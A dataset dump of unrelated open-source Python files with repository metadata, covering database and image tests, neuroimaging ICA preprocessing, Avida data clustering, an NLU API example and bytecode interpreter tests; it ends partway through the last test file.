NASA-IMPACT/hls-sentinel2-downloader-serverless
|
e3e4f542fc805c6259f20a6dd932c98cccd4144c
|
[
"Apache-2.0"
] | 2
|
2021-07-23T00:49:42.000Z
|
2021-07-23T00:51:25.000Z
|
layers/db/db/tests/test_db.py
|
NASA-IMPACT/hls-sentinel2-downloader-serverless
|
e3e4f542fc805c6259f20a6dd932c98cccd4144c
|
[
"Apache-2.0"
] | null | null | null |
import os
import pytest
from assertpy import assert_that
from ..models.granule import Granule
from ..models.granule_count import GranuleCount
from ..models.status import Status
from ..session import _get_url, get_session, get_session_maker
@pytest.mark.usefixtures("db_connection_secret")
def test_that_db_correctly_gets_db_connection_details():
url = _get_url()
assert_that(url.drivername).is_equal_to("postgresql")
assert_that(url.host).is_equal_to("localhost")
assert_that(url.username).is_equal_to(os.environ["PG_USER"])
assert_that(url.password).is_equal_to(os.environ["PG_PASSWORD"])
assert_that(url.database).is_equal_to(os.environ["PG_DB"])
@pytest.mark.usefixtures("db_connection_secret")
@pytest.mark.usefixtures("db_session")
def test_that_db_can_create_successful_connection_with_granule():
session_maker = get_session_maker()
with get_session(session_maker) as db:
granules = db.query(Granule).all()
assert_that(granules).is_length(0)
@pytest.mark.usefixtures("db_connection_secret")
@pytest.mark.usefixtures("db_session")
def test_that_db_can_create_successful_connection_with_granule_count():
session_maker = get_session_maker()
with get_session(session_maker) as db:
granule_counts = db.query(GranuleCount).all()
assert_that(granule_counts).is_length(0)
@pytest.mark.usefixtures("db_connection_secret")
@pytest.mark.usefixtures("db_session")
def test_that_db_can_create_successful_connection_with_status():
session_maker = get_session_maker()
with get_session(session_maker) as db:
statuses = db.query(Status).all()
assert_that(statuses).is_length(0)
| 35.595745
| 71
| 0.780036
| 0
| 0
| 0
| 0
| 1,419
| 0.848177
| 0
| 0
| 176
| 0.1052
|
774d4b0cb7fee10f0f0fa488de8d167fefa2fbd2
| 1,478
|
py
|
Python
|
dexp/processing/utils/_test/test_normalise.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 16
|
2021-04-21T14:09:19.000Z
|
2022-03-22T02:30:59.000Z
|
dexp/processing/utils/_test/test_normalise.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 28
|
2021-04-15T17:43:08.000Z
|
2022-03-29T16:08:35.000Z
|
dexp/processing/utils/_test/test_normalise.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 3
|
2022-02-08T17:41:30.000Z
|
2022-03-18T15:32:27.000Z
|
import numpy as np
import pytest
from arbol import aprint
from dexp.processing.utils.normalise import Normalise
from dexp.utils.backends import Backend
from dexp.utils.testing.testing import execute_both_backends
@execute_both_backends
@pytest.mark.parametrize(
"dexp_nuclei_background_data",
[dict(length_xy=128, dtype=np.float32)],
indirect=True,
)
def test_normalise(dexp_nuclei_background_data):
_, _, image = dexp_nuclei_background_data
image = image.astype(np.uint16) # required to convert afterwards
normalise = Normalise(image, low=-0.5, high=1, in_place=False, clip=True, dtype=np.float32)
image_normalised = normalise.forward(image)
image_denormalised = normalise.backward(image_normalised)
assert image_normalised.dtype == np.float32
assert image_denormalised.dtype == image.dtype
assert image_normalised.shape == image.shape
assert image_denormalised.shape == image.shape
assert image_normalised.min() >= -0.5
assert image_normalised.max() <= 1
assert image_normalised.max() - image_normalised.min() >= 1.5
assert image_denormalised.min() * (1 + 1e-3) >= image.min()
assert image_denormalised.max() <= (1 + 1e-3) * image.max()
assert (image_denormalised.max() - image_denormalised.min()) * (1 + 1e-3) >= image.max() - image.min()
xp = Backend.get_xp_module()
error = xp.median(xp.abs(image - image_denormalised)).item()
aprint(f"Error = {error}")
assert error < 1e-6
| 34.372093
| 106
| 0.725981
| 0
| 0
| 0
| 0
| 1,261
| 0.85318
| 0
| 0
| 79
| 0.053451
|
774ee32b7bd61777145b97c33929e59c467687c5
| 64
|
py
|
Python
|
pyCameras/__init__.py
|
imr-luh/pyCameras
|
30fc220022b0562f5244d9fd5f436b8630abe4cd
|
[
"MIT"
] | 2
|
2019-05-10T08:43:38.000Z
|
2019-05-17T16:00:13.000Z
|
pyCameras/__init__.py
|
imr-luh/pyCameras
|
30fc220022b0562f5244d9fd5f436b8630abe4cd
|
[
"MIT"
] | null | null | null |
pyCameras/__init__.py
|
imr-luh/pyCameras
|
30fc220022b0562f5244d9fd5f436b8630abe4cd
|
[
"MIT"
] | 2
|
2020-03-10T17:15:08.000Z
|
2020-04-24T09:02:21.000Z
|
__version__ = '0.0.1'
from . import utils
from .utils import *
| 12.8
| 21
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.109375
|
774f04287f666d1e053a72b91ac8437dc815a95d
| 427
|
py
|
Python
|
sdfspu/sdf_net.py
|
soundmaking/sdfspu
|
164af2602d07b18c45a8182cd5e9638628c7e165
|
[
"MIT"
] | null | null | null |
sdfspu/sdf_net.py
|
soundmaking/sdfspu
|
164af2602d07b18c45a8182cd5e9638628c7e165
|
[
"MIT"
] | null | null | null |
sdfspu/sdf_net.py
|
soundmaking/sdfspu
|
164af2602d07b18c45a8182cd5e9638628c7e165
|
[
"MIT"
] | null | null | null |
import socket
def get_ip():
# https://stackoverflow.com/a/28950776/9471339
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
if __name__ == "__main__":
print('IP via get_ip():\t', get_ip())
| 21.35
| 56
| 0.58548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 138
| 0.323185
|
775087ff0c58dbd29b82c1af2c4f5dcf0ce17d5d
| 844
|
py
|
Python
|
pysparkling/sql/expressions/literals.py
|
ptallada/pysparkling
|
f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78
|
[
"Apache-2.0"
] | 260
|
2015-05-11T18:08:44.000Z
|
2022-01-15T13:19:43.000Z
|
pysparkling/sql/expressions/literals.py
|
ptallada/pysparkling
|
f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78
|
[
"Apache-2.0"
] | 79
|
2015-06-02T09:53:25.000Z
|
2021-09-26T11:18:18.000Z
|
pysparkling/sql/expressions/literals.py
|
ptallada/pysparkling
|
f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78
|
[
"Apache-2.0"
] | 50
|
2015-06-06T17:00:58.000Z
|
2022-01-15T13:19:18.000Z
|
from ..utils import AnalysisException
from .expressions import Expression
class Literal(Expression):
def __init__(self, value):
super().__init__()
self.value = value
def eval(self, row, schema):
return self.value
def __str__(self):
if self.value is True:
return "true"
if self.value is False:
return "false"
if self.value is None:
return "NULL"
return str(self.value)
def get_literal_value(self):
if hasattr(self.value, "expr") or isinstance(self.value, Expression):
raise AnalysisException("Value should not be a Column or an Expression,"
f" but got {type(self)}: {self}")
return self.value
def args(self):
return (self.value, )
__all__ = ["Literal"]
| 25.575758
| 84
| 0.582938
| 743
| 0.880332
| 0
| 0
| 0
| 0
| 0
| 0
| 114
| 0.135071
|
7750af67ab2df68b6c19d4aa9f6c7f583c889749
| 3,812
|
py
|
Python
|
filter_ICA.py
|
MadsJensen/RP_scripts
|
b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf
|
[
"BSD-3-Clause"
] | null | null | null |
filter_ICA.py
|
MadsJensen/RP_scripts
|
b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf
|
[
"BSD-3-Clause"
] | null | null | null |
filter_ICA.py
|
MadsJensen/RP_scripts
|
b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 8 14:45:02 2014.
@author: mje
"""
import mne
import sys
from mne.io import Raw
from mne.preprocessing import ICA, create_eog_epochs, create_ecg_epochs
import matplotlib
matplotlib.use('Agg')
from my_settings import *
subject = sys.argv[1]
# SETTINGS
n_jobs = 1
l_freq, h_freq = 1, 95 # High and low frequency setting for the band pass
n_freq = 50 # notch filter frequency
decim = 4 # decim value
for condition in conditions:
raw = Raw(mf_autobad_off_folder + "%s_%s_mc_tsss-raw.fif" %
(subject, condition),
preload=True)
raw.drop_channels(raw.info["bads"])
raw.notch_filter(n_freq, n_jobs=n_jobs)
raw.filter(l_freq, None, n_jobs=n_jobs)
raw.save(
mf_autobad_off_folder + "%s_%s_filtered_mc_tsss-raw.fif" %
(subject, condition),
overwrite=True)
# ICA Part
ica = ICA(n_components=0.99, method='fastica', max_iter=512)
picks = mne.pick_types(
raw.info,
meg=True,
eeg=False,
eog=False,
emg=False,
stim=False,
exclude='bads')
ica.fit(raw, picks=picks, decim=decim, reject=reject_params)
# maximum number of components to reject
n_max_eog = 1
n_max_ecg = 3
##########################################################################
# 2) identify bad components by analyzing latent sources.
# DETECT EOG BY CORRELATION
# HORIZONTAL EOG
title = "ICA: %s for %s"
eog_epochs = create_eog_epochs(raw, ch_name="EOG002") # TODO: check EOG
eog_average = eog_epochs.average()
# channel name
eog_inds, scores = ica.find_bads_eog(raw)
eog_inds = eog_inds[:n_max_eog]
ica.exclude += eog_inds
if eog_inds:
fig = ica.plot_scores(
scores, exclude=eog_inds, title=title % ('eog', subject))
fig.savefig(ica_folder + "plots/%s_%s_eog_scores_2.png" % (subject,
condition))
fig = ica.plot_sources(eog_average, exclude=eog_inds)
fig.savefig(ica_folder + "plots/%s_%s_eog_source_2.png" % (subject,
condition))
fig = ica.plot_components(
eog_inds, title=title % ('eog', subject), colorbar=True)
fig.savefig(ica_folder + "plots/%s_%s_eog_component_2.png" % (
subject, condition))
fig = ica.plot_overlay(eog_average, exclude=eog_inds, show=False)
fig.savefig(ica_folder + "plots/%s_%s_eog_excluded_2.png" % (
subject, condition))
del eog_epochs, eog_average
# ECG
ecg_epochs = create_ecg_epochs(raw, tmin=-.5, tmax=.5)
ecg_inds, scores = ica.find_bads_ecg(ecg_epochs)
ecg_inds = ecg_inds[:n_max_ecg]
ica.exclude.extend(ecg_inds)
if ecg_inds:
fig = ica.plot_components(
ecg_inds, title=title % ('ecg', subject), colorbar=True)
fig.savefig(ica_folder + "plots/%s_%s_ecg_component_2.png" % (
subject, condition))
fig = ica.plot_overlay(raw, exclude=ecg_inds, show=False)
fig.savefig(ica_folder + "plots/%s_%s_ecg_excluded_2.png" % (
subject, condition))
fig = ica.plot_properties(raw, picks=ecg_inds)
fig[0].savefig(ica_folder + "plots/%s_%s_plot_properties_2.png" % (
subject, condition))
##########################################################################
# Apply the solution to Raw, Epochs or Evoked like this:
raw_ica = ica.apply(raw)
ica.save(ica_folder + "%s_%s-ica_2.fif" % (subject, condition)) # save ICA
# componenets
# Save raw with ICA removed
raw_ica.save(
ica_folder + "%s_%s_ica-raw.fif" % (subject, condition),
overwrite=True)
| 32.033613
| 79
| 0.594439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,000
| 0.262329
|
77526fa74a8b3626dd46cca703ea3aecf100938a
| 428
|
py
|
Python
|
typish/_types.py
|
georgeharker/typish
|
1c043beb74d89e62b10339a2a964f60ec175adfa
|
[
"MIT"
] | 16
|
2019-08-03T13:57:17.000Z
|
2021-11-08T11:51:52.000Z
|
typish/_types.py
|
georgeharker/typish
|
1c043beb74d89e62b10339a2a964f60ec175adfa
|
[
"MIT"
] | 27
|
2019-09-11T13:24:38.000Z
|
2022-02-11T07:04:12.000Z
|
typish/_types.py
|
georgeharker/typish
|
1c043beb74d89e62b10339a2a964f60ec175adfa
|
[
"MIT"
] | 7
|
2019-11-18T16:50:09.000Z
|
2021-11-01T14:34:39.000Z
|
"""
PRIVATE MODULE: do not import (from) it directly.
This module contains types that are not available by default.
"""
import typing
from inspect import Parameter
T = typing.TypeVar('T')
KT = typing.TypeVar('KT')
VT = typing.TypeVar('VT')
Empty = Parameter.empty
Unknown = type('Unknown', (Empty, ), {})
Module = type(typing)
NoneType = type(None)
Ellipsis_ = type(...) # Use EllipsisType instead.
EllipsisType = type(...)
| 22.526316
| 61
| 0.703271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 167
| 0.390187
|
7752a70c09c370c66d0c734d9856294edf75f0f4
| 11,172
|
py
|
Python
|
avidaspatial/transform_data.py
|
emilydolson/avida-spatial-tools
|
7beb0166ccefad5fa722215b030ac2a53d62b59e
|
[
"MIT"
] | 1
|
2018-06-12T18:31:40.000Z
|
2018-06-12T18:31:40.000Z
|
avidaspatial/transform_data.py
|
emilydolson/avida-spatial-tools
|
7beb0166ccefad5fa722215b030ac2a53d62b59e
|
[
"MIT"
] | 1
|
2016-02-03T23:37:09.000Z
|
2016-02-03T23:37:09.000Z
|
avidaspatial/transform_data.py
|
emilydolson/avida-spatial-tools
|
7beb0166ccefad5fa722215b030ac2a53d62b59e
|
[
"MIT"
] | null | null | null |
from .utils import *
from scipy.spatial.distance import pdist
import scipy.cluster.hierarchy as hierarchicalcluster
def rank_environment_and_phenotypes(environment, phenotypes, k=15):
"""
Clusters sets of resources/tasks using a weighted hamming distance such
that you can have few enough values to give each group of similar things a
different color. This function is designed for cases when you want to
color both an environment and a set of phenotypes such that the colors
corespond to each other.
Takes an EnvironmentFile object, a 2d array of phenotypes, and, optionally,
a number indicating the maximum number of clusters (default 15).
Returns:
- An EnvironmentFile in which the grid has been replaced with integers
indicating which cluster a cell is a member of. Integers are assigned
such that cells containing more or more complex resources have higher
numbers.
- A 2D grid of numbers representing the clusters each phenotype was
assigned to.
- An integer representing the total number of clusters.
"""
environment = convert_world_to_phenotype(environment)
ranks = get_ranks_for_environment_and_phenotypes(environment, phenotypes)
environment, n = assign_ranks_by_cluster(environment, k, ranks)
phenotypes, n = assign_ranks_by_cluster(phenotypes, k, ranks)
return environment, phenotypes, n
def do_clustering(types, max_clust):
"""
Helper method for clustering that takes a list of all of the things being
clustered (which are assumed to be binary numbers represented as strings),
and an int representing the maximum number of clusters that are allowed.
Returns: A dictionary mapping cluster ids to lists of numbers that are part
of that cluster.
"""
# Fill in leading zeros to make all numbers same length.
ls = [list(t[t.find("b")+1:]) for t in types]
prepend_zeros_to_lists(ls)
dist_matrix = pdist(ls, weighted_hamming)
clusters = hierarchicalcluster.complete(dist_matrix)
clusters = hierarchicalcluster.fcluster(clusters, max_clust,
criterion="maxclust")
# Group members of each cluster together
cluster_dict = dict((c, []) for c in set(clusters))
for i in range(len(types)):
cluster_dict[clusters[i]].append(types[i])
return cluster_dict
def rank_clusters(cluster_dict):
"""
Helper function for clustering that takes a dictionary mapping cluster
ids to lists of the binary strings that are part of that cluster and
returns a dictionary mapping cluster ids to integers representing their
"rank". Ranks provide an ordering for the clusters such that each
cluster has its own rank, and clusters are ordered from simplest to
most complex.
"""
# Figure out the relative rank of each cluster
cluster_ranks = dict.fromkeys(cluster_dict.keys())
for key in cluster_dict:
cluster_ranks[key] = eval(string_avg(cluster_dict[key], binary=True))
i = len(cluster_ranks)
for key in sorted(cluster_ranks, key=cluster_ranks.get):
cluster_ranks[key] = i
i -= 1
return cluster_ranks
def get_ranks_for_environment_and_phenotypes(environment, phenotypes, k=15):
"""
Takes an EnvironmentFile and a 2d array represemtimg phenotypes at each
location. Optionally also takes an integer indicating the maximum number
of clusters allowed to be created (default 15).
Environment is expected to already have been converted to binary numbers
(generally because this is being called by rank_environment_and_phenotypes)
Return a dictionary mapping binary strings representing groups of
resources/tasks that are present/performed in a given cell to integers
indicating the ranked order of the cluster they're part of.
"""
# Create list of all niches and all phenotypes, in phenotype format
niches = flatten_array(environment)
phenotypes = flatten_array(phenotypes)
types = set(phenotypes+niches)
types.discard("-0b1") # We'll handle this specially
types.discard("0b0") # We'll handle this specially
# Do all clustering ahead of time so colors remain consistent.
ranks = generate_ranks(list(types), k)
ranks["-0b1"] = -1 # The empty phenotype/niche should always be rank -1
ranks["0b0"] = 0 # The empty phenotype/niche should always be rank 0
return ranks
def assign_ranks_by_cluster(grid, n, ranks=None):
"""
Takes a 2D array representing phenotypes or resource sets across the world,
and integer rpresenting the maximum number of clusters allowed, and
optionally a dictionary indicating the rank of the cluster of each
phenotype/resource set. If this dictionary is not provided, one will be
generated.
Returns: - A 2d array of numbers indicating the ranks of the clusters
of the resource set/phenotype in each cell
- An integer representing the number of clusters created.
"""
if ranks is None:
ranks = generate_ranks(grid, n)
return assign_ranks_to_grid(grid, ranks), len(ranks)
def generate_ranks(grid, n):
"""
Takes a grid of phenotypes or resource sets representing as strings
representing binary numbers, and an integer indicating the maximum number
of clusters to generated.
Clusters the data in grid into a maximum of n groups, ranks each group by
the complexity and length of its "average" member, and returns a dictionary
mapping binary numbers to integers representing the rank of the cluster
they're part of.
"""
phenotypes = deepcopy(grid)
if type(phenotypes) is list and type(phenotypes[0]) is list:
phenotypes = flatten_array(phenotypes)
# Remove duplicates from types
types = list(frozenset(phenotypes))
if len(types) < n:
ranks = rank_types(types)
else:
ranks = cluster_types(types, n)
return ranks
def assign_ranks_to_grid(grid, ranks):
"""
Takes a 2D array of binary numbers represented as strings and a dictionary
mapping binary strings to integers representing the rank of the cluster
they belong to, and returns a grid in which each binary number has been
replaced with the rank of its cluster.
"""
assignments = deepcopy(grid)
ranks["0b0"] = 0
ranks["-0b1"] = -1
for i in range(len(grid)):
for j in range(len(grid[i])):
if type(grid[i][j]) is list:
for k in range(len(grid[i][j])):
assignments[i][j][k] = ranks[grid[i][j][k]]
else:
assignments[i][j] = ranks[grid[i][j]]
return assignments
def cluster_types(types, max_clust=12):
"""
Generates a dictionary mapping each binary number in types to an integer
from 0 to max_clust. Hierarchical clustering is used to determine which
which binary numbers should map to the same integer.
"""
if len(types) < max_clust:
max_clust = len(types)
# Do actual clustering
cluster_dict = do_clustering(types, max_clust)
cluster_ranks = rank_clusters(cluster_dict)
# Create a dictionary mapping binary numbers to indices
ranks = {}
for key in cluster_dict:
for typ in cluster_dict[key]:
ranks[typ] = cluster_ranks[key]
return ranks
def rank_types(types):
"""
Takes a list of binary numbers and returns a dictionary mapping each
binary number to an integer indicating it's rank within the list.
This is basically the better alternative to cluster_types, that works
in that perfect world where we have few enough types to represent each
as its own color.
"""
include_null = '0b0' in types
sorted_types = deepcopy(types)
for i in range(len(sorted_types)):
sorted_types[i] = int(sorted_types[i], 2)
sorted_types.sort()
ranks = {}
for t in types:
ranks[t] = sorted_types.index(eval(t)) + int(not include_null)
return ranks
def make_count_grid(data):
"""
Takes a 2 or 3d grid of strings representing binary numbers.
Returns a grid of the same dimensions in which each binary number has been
replaced by an integer indicating the number of ones that were in that
number.
"""
data = deepcopy(data)
for i in range(len(data)):
for j in range(len(data[i])):
for k in range(len(data[i][j])):
if type(data[i][j][k]) is list:
for l in range(len(data[i][j][k])):
try:
data[i][j][k] = data[i][j][k][l].count("1")
except:
data[i][j][k] = len(data[i][j][k][l])
else:
try:
data[i][j][k] = data[i][j][k].count("1")
except:
data[i][j][k] = len(data[i][j][k])
return data
def make_optimal_phenotype_grid(environment, phenotypes):
"""
Takes an EnvironmentFile object and a 2d array of phenotypes and returns
a 2d array in which each location contains an index representing the
distance between the phenotype in that location and the optimal phenotype
for that location.
This is acheived by using the task list in the EnvironmentFile to convert
the phenotypes to sets of tasks, and comparing them to the sets of
resources in the environment. So if the environment file that you created
the EnvironmentFile object from for some reason doesn't contain all of the
tasks, or doesn't contain them in the right order this won't work. If this
is the environment file that you used for the run of Avida that generated
this data, you should be fine.
"""
world_size = environment.size
phenotypes = deepcopy(phenotypes)
for i in range(world_size[1]):
for j in range(world_size[0]):
for k in range(len(phenotypes[i][j])):
phenotype = phenotype_to_res_set(phenotypes[i][j][k],
environment.tasks)
diff = len(environment[i][j].symmetric_difference(phenotype))
phenotypes[i][j][k] = diff
return phenotypes
def task_percentages(data, n_tasks=9):
"""
Takes a 3D array of strings representing binary numbers and calculates
the percentage of organisms in each cell (across multiple files)
that were doing a given task.
Returns an m x n x n_tasks array indicating the percentages of organisms
at each location (across the 3rd dimension) that were doing each task.
"""
pdata = deepcopy(data)
for i in range(len(data)):
for j in range(len(data[0])):
percentages = [0.0]*n_tasks
for k in range(len(data[i][j])):
b_ind = data[i][j][k].find("b")
for l in range(b_ind+1, len(data[i][j][k])):
percentages[l-2] += int(data[i][j][k][l])
for p in range(len(percentages)):
percentages[p] /= len(data[i][j])
pdata[i][j] = percentages
return pdata
| 36.993377
| 79
| 0.669083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,989
| 0.536072
|
775334a35368377b6411b76e0cda684325c797b3
| 119
|
py
|
Python
|
Python/ComplexPaths02/src/main/MainModule01.py
|
tduoth/JsObjects
|
eb3e2a8b1f47d0da53c8b1a85a7949269711932f
|
[
"MIT"
] | 22
|
2015-02-26T09:07:18.000Z
|
2020-05-10T16:22:05.000Z
|
Python/ComplexPaths02/src/main/MainModule01.py
|
tduoth/JsObjects
|
eb3e2a8b1f47d0da53c8b1a85a7949269711932f
|
[
"MIT"
] | 123
|
2016-04-05T18:32:41.000Z
|
2022-03-13T21:09:21.000Z
|
Python/ComplexPaths02/src/main/MainModule01.py
|
tduoth/JsObjects
|
eb3e2a8b1f47d0da53c8b1a85a7949269711932f
|
[
"MIT"
] | 56
|
2015-03-19T22:26:37.000Z
|
2021-12-06T02:52:02.000Z
|
'''
Created on May 26, 2012
@author: Charlie
'''
class MainModule01(object):
def __init__(self):
pass
| 13.222222
| 27
| 0.613445
| 69
| 0.579832
| 0
| 0
| 0
| 0
| 0
| 0
| 49
| 0.411765
|
7753e7fec1d5a58812ddcacb76ec8e3307a0b943
| 2,109
|
py
|
Python
|
examples/image_dataset_create.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 9
|
2017-10-10T12:24:23.000Z
|
2021-08-18T14:07:51.000Z
|
examples/image_dataset_create.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 1
|
2020-12-06T11:03:25.000Z
|
2021-04-14T05:21:23.000Z
|
examples/image_dataset_create.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 2
|
2019-02-12T08:26:06.000Z
|
2022-02-01T09:39:47.000Z
|
""" Example: Shows how to create and use an image dataset. """
import urllib3
import feersum_nlu
from feersum_nlu.rest import ApiException
from examples import feersumnlu_host, feersum_nlu_auth_token
# from feersum_nlu_util import image_utils
# Configure API key authorization: APIKeyHeader
configuration = feersum_nlu.Configuration()
# configuration.api_key['AUTH_TOKEN'] = feersum_nlu_auth_token
configuration.api_key['X-Auth-Token'] = feersum_nlu_auth_token # Alternative auth key header!
configuration.host = feersumnlu_host
api_instance = feersum_nlu.ImageDatasetsApi(feersum_nlu.ApiClient(configuration))
instance_name = 'labelled_images_1'
create_details = feersum_nlu.ImageDatasetCreateDetails(name=instance_name,
desc=instance_name,
load_from_store=False)
caller_name = 'example_caller'
print()
try:
print("Create the image dataset:")
api_response = api_instance.image_dataset_create(create_details)
print(" type(api_response)", type(api_response))
print(" api_response", api_response)
print()
print("Get the details of specific named loaded image dataset:")
api_response = api_instance.image_dataset_get_details(instance_name)
print(" type(api_response)", type(api_response))
print(" api_response", api_response)
print()
# print("Delete named loaded image dataset:")
# api_response = api_instance.image_dataset_del(instance_name)
# print(" type(api_response)", type(api_response))
# print(" api_response", api_response)
# print()
#
# print("Vaporise named loaded image dataset:")
# api_response = api_instance.image_dataset_vaporise(instance_name)
# print(" type(api_response)", type(api_response))
# print(" api_response", api_response)
# print()
except ApiException as e:
print("Exception when calling a image dataset operation: %s\n" % e)
except urllib3.exceptions.HTTPError as e:
print("Connection HTTPError! %s\n" % e)
| 35.745763
| 95
| 0.699384
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.456615
|
775402adbd62e329a7b317ab8391c40e03b9d6e5
| 2,536
|
py
|
Python
|
tests/test_resource_base.py
|
neteler/actinia_statistic_plugin
|
428d191830bb59a8927fde68fd1e4439331fef97
|
[
"MIT"
] | 3
|
2018-10-16T14:32:07.000Z
|
2020-03-24T18:07:02.000Z
|
tests/test_resource_base.py
|
neteler/actinia_statistic_plugin
|
428d191830bb59a8927fde68fd1e4439331fef97
|
[
"MIT"
] | 7
|
2019-10-01T07:46:52.000Z
|
2022-03-24T09:26:53.000Z
|
tests/test_resource_base.py
|
neteler/actinia_statistic_plugin
|
428d191830bb59a8927fde68fd1e4439331fef97
|
[
"MIT"
] | 4
|
2018-10-26T11:52:09.000Z
|
2020-03-24T18:07:03.000Z
|
# -*- coding: utf-8 -*-
import atexit
import os
import signal
import time
from flask_restful import Api
from actinia_core.testsuite import ActiniaTestCaseBase, URL_PREFIX
from actinia_core.core.common.config import global_config
from actinia_core.core.common.app import flask_app, flask_api
from actinia_statistic_plugin.endpoints import create_endpoints
from actinia_core.endpoints import create_endpoints as create_actinia_endpoints
__license__ = "GPLv3"
__author__ = "Sören Gebbert"
__copyright__ = "Copyright 2016-2019, Sören Gebbert"
__maintainer__ = "Sören Gebbert"
__email__ = "soerengebbert@googlemail.com"
redis_pid = None
server_test = False
custom_actinia_cfg = False
create_actinia_endpoints()
create_endpoints(flask_api)
# If this environmental variable is set, then a real http request will be send
# instead of using the flask test_client.
if "ACTINIA_SERVER_TEST" in os.environ:
server_test = bool(os.environ["ACTINIA_SERVER_TEST"])
# Set this variable to use a actinia config file in a docker container
if "ACTINIA_CUSTOM_TEST_CFG" in os.environ:
custom_actinia_cfg = str(os.environ["ACTINIA_CUSTOM_TEST_CFG"])
def setup_environment():
global redis_pid
# Set the port to the test redis server
global_config.REDIS_SERVER_SERVER = "localhost"
global_config.REDIS_SERVER_PORT = 7000
# home = os.getenv("HOME")
# GRASS
# Setup the test environment
global_config.GRASS_GIS_BASE="/usr/local/grass79/"
global_config.GRASS_GIS_START_SCRIPT="/usr/local/bin/grass79"
# global_config.GRASS_DATABASE= "/usr/local/grass_test_db"
# global_config.GRASS_DATABASE = "%s/actinia/grass_test_db" % home
global_config.GRASS_TMP_DATABASE = "/tmp"
if server_test is False and custom_actinia_cfg is False:
# Start the redis server for user and logging management
redis_pid = os.spawnl(os.P_NOWAIT, "/usr/bin/redis-server",
"common/redis.conf",
"--port %i" % global_config.REDIS_SERVER_PORT)
time.sleep(1)
if server_test is False and custom_actinia_cfg is not False:
global_config.read(custom_actinia_cfg)
def stop_redis():
if server_test is False:
global redis_pid
# Kill th redis server
if redis_pid is not None:
os.kill(redis_pid, signal.SIGTERM)
# Register the redis stop function
atexit.register(stop_redis)
# Setup the environment
setup_environment()
class ActiniaResourceTestCaseBase(ActiniaTestCaseBase):
pass
| 32.512821
| 79
| 0.742902
| 64
| 0.025207
| 0
| 0
| 0
| 0
| 0
| 0
| 884
| 0.348169
|
7755642e2df8bfea6999683ed9d91b14f6530187
| 5,560
|
py
|
Python
|
interpreter/code/tests/test_basic.py
|
yunkai123/my-500lines-notes
|
60fd3b18919b5bcb90ddece9e088c1c152438972
|
[
"MIT"
] | null | null | null |
interpreter/code/tests/test_basic.py
|
yunkai123/my-500lines-notes
|
60fd3b18919b5bcb90ddece9e088c1c152438972
|
[
"MIT"
] | null | null | null |
interpreter/code/tests/test_basic.py
|
yunkai123/my-500lines-notes
|
60fd3b18919b5bcb90ddece9e088c1c152438972
|
[
"MIT"
] | null | null | null |
""" Byterund 的基本测试"""
import vmtest
class It(vmtest.VmTestCase):
def test1(self):
self.assert_ok("""\
class Thing(object):
@staticmethod
def smeth(x):
print(x)
@classmethod
def cmeth(cls, x):
print(x)
Thing.smeth(1492)
Thing.cmeth(1776)
""")
def test_contstant(self):
self.assert_ok("17")
def test_for_loop(self):
self.assert_ok("""\
out = ""
for i in range(5):
out = out + str(i)
print(out)
""")
def test_slice(self):
self.assert_ok("""\
print("hello, world"[3:8])
""")
self.assert_ok("""\
print("hello, world"[:8])
""")
self.assert_ok("""\
print("hello, world"[3:])
""")
self.assert_ok("""\
print("hello, world"[:])
""")
self.assert_ok("""\
print("hello, world"[::-1])
""")
self.assert_ok("""\
print("hello, world"[3:8:2])
""")
def test_slice_assignment(self):
self.assert_ok("""\
l = list(range(10))
l[3:8] = ["x"]
print(l)
""")
self.assert_ok("""\
l = list(range(10))
l[:8] = ["x"]
print(l)
""")
self.assert_ok("""\
l = list(range(10))
l[3:] = ["x"]
print(l)
""")
self.assert_ok("""\
l = list(range(10))
l[:] = ["x"]
print(l)
""")
def test_building_stuff(self):
self.assert_ok("""\
print((1+1, 2+2, 3+3))
""")
self.assert_ok("""\
print([1+1, 2+2, 3+3])
""")
self.assert_ok("""\
print({1:1+1, 2:2+2, 3:3+3})
""")
def test_subscripting(self):
self.assert_ok("""\
l = list(range(10))
print("%s %s %s" % (l[0], l[3], l[9]))
""")
self.assert_ok("""\
l = list(range(10))
l[5] = 17
print(l)
""")
def test_list_comprehension(self):
self.assert_ok("""\
x = [z*z for z in range(5)]
assert x == [0, 1, 4, 9, 16]
""")
def test_unary_operators(self):
self.assert_ok("""\
x = 8
print(-x, ~x, not x)
""")
def test_attributes(self):
self.assert_ok("""\
l = lambda: 1 # Just to have an object...
l.foo = 17
print(hasattr(l, "foo"), l.foo)
# del l.foo
# print(hasattr(l, "foo"))
""")
def test_import(self):
self.assert_ok("""\
import math
print(math.pi, math.e)
from math import sqrt
print(sqrt(2))
# from math import * # not supported
# print(sin(2))
""")
def test_staticmethods(self):
self.assert_ok("""\
class Thing(object):
@staticmethod
def smeth(x):
print(x)
@classmethod
